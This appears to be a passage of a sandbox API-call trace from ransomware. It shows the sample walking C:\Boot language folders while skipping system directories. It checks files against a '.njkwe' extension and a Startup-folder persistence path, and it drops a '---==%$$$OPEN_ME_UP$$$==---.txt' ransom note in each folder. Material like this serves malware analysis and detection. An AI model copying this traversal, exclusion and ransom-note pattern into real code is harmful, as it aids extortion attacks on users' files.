(lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0064.995] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 33 [0064.995] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0064.995] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.995] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0064.995] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.995] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.995] FindNextFileW (in: hFindFile=0xc19d20, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef538bee, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0064.995] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0064.995] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0064.995] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0064.995] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0064.995] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0064.995] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\memtest.exe.mui") returned 33 [0064.995] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0064.996] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.996] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0064.996] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\de-DE\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.996] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.996] FindNextFileW (in: hFindFile=0xc19d20, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef538bee, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0064.996] FindClose (in: hFindFile=0xc19d20 | out: hFindFile=0xc19d20) returned 1 [0064.996] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0064.996] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\de-de\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.997] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0064.998] CloseHandle (hObject=0x428) returned 1 [0064.998] GetProcessHeap () returned 0xbe0000 [0064.998] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.998] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="el-GR", cAlternateFileName="")) returned 1 [0064.998] lstrcmpiW (lpString1="el-GR", lpString2="Windows") returned -1 [0064.998] lstrcmpiW (lpString1="el-GR", lpString2="$Recycle.bin") returned 1 [0064.998] lstrcmpiW (lpString1="el-GR", lpString2="System Volume Information") returned -1 [0064.999] lstrcmpiW (lpString1="el-GR", lpString2="Program Files") returned -1 [0064.999] lstrcmpiW (lpString1="el-GR", lpString2="Program Files (x86)") returned -1 [0064.999] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR") returned 17 [0064.999] lstrcmpW (lpString1="el-GR", lpString2=".") returned 1 [0064.999] lstrcmpW (lpString1="el-GR", lpString2="..") returned 1 [0064.999] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\el-GR", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0064.999] GetProcessHeap () returned 0xbe0000 [0064.999] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.999] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\*") returned 19 [0064.999] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\el-GR\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a1a0 [0064.999] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.999] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.999] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.999] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.999] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.999] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\.") returned 19 [0064.999] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.999] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0064.999] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.999] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.999] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.999] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.999] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.999] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\..") returned 20 [0064.999] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.999] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.999] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13960, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.999] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0064.999] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0064.999] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.000] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.000] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.000] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 33 [0065.000] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.000] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.000] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.000] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.000] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.000] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb5a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0065.000] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0065.000] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.000] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0065.000] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0065.000] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.000] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\memtest.exe.mui") returned 33 [0065.000] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.000] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.000] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0065.000] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\el-GR\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.000] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.001] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb5a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0065.001] FindClose (in: hFindFile=0xc1a1a0 | out: hFindFile=0xc1a1a0) returned 1 [0065.001] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.001] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\el-gr\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.003] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.004] CloseHandle (hObject=0x428) returned 1 [0065.004] GetProcessHeap () returned 0xbe0000 [0065.004] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.004] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="en-GB", cAlternateFileName="")) returned 1 [0065.004] lstrcmpiW (lpString1="en-GB", lpString2="Windows") returned -1 [0065.004] lstrcmpiW (lpString1="en-GB", lpString2="$Recycle.bin") returned 1 [0065.004] lstrcmpiW (lpString1="en-GB", lpString2="System Volume Information") returned -1 [0065.004] lstrcmpiW (lpString1="en-GB", lpString2="Program Files") returned -1 [0065.004] lstrcmpiW (lpString1="en-GB", lpString2="Program Files (x86)") returned -1 [0065.004] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-GB") returned 17 [0065.004] lstrcmpW (lpString1="en-GB", lpString2=".") returned 1 [0065.004] lstrcmpW (lpString1="en-GB", lpString2="..") returned 1 [0065.004] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\en-GB", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.004] GetProcessHeap () returned 0xbe0000 [0065.004] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.004] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\en-GB\\*") returned 19 [0065.004] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\en-GB\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19da0 [0065.005] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.005] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.005] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.005] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.005] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.005] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-GB\\.") returned 19 [0065.005] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.005] FindNextFileW (in: hFindFile=0xc19da0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.005] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.005] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.005] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.005] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.005] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.005] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-GB\\..") returned 20 [0065.005] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.005] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.005] FindNextFileW (in: hFindFile=0xc19da0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12158, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.005] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.005] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.005] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.005] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.005] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.005] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 33 [0065.005] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.005] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.005] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.005] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\en-GB\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.005] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.005] FindNextFileW (in: hFindFile=0xc19da0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12158, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0065.006] FindClose (in: hFindFile=0xc19da0 | out: hFindFile=0xc19da0) returned 1 [0065.006] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-GB\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.006] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-GB\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\en-gb\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.006] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.007] CloseHandle (hObject=0x428) returned 1 [0065.007] GetProcessHeap () returned 0xbe0000 [0065.007] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.007] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="en-US", cAlternateFileName="")) returned 1 [0065.007] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0065.007] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0065.007] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0065.007] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0065.007] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0065.007] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US") returned 17 [0065.007] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0065.007] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0065.007] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\en-US", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.007] GetProcessHeap () returned 0xbe0000 [0065.008] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.008] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\*") returned 19 [0065.008] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\en-US\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a220 [0065.008] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.008] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.008] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.008] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.008] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.008] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\.") returned 19 [0065.008] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.008] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.008] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.015] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.015] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.015] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.015] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.015] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\..") returned 20 [0065.015] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.015] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.015] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef569843, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x327294d0, ftLastWriteTime.dwHighDateTime=0x1d2a030, nFileSizeHigh=0x0, nFileSizeLow=0x121a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 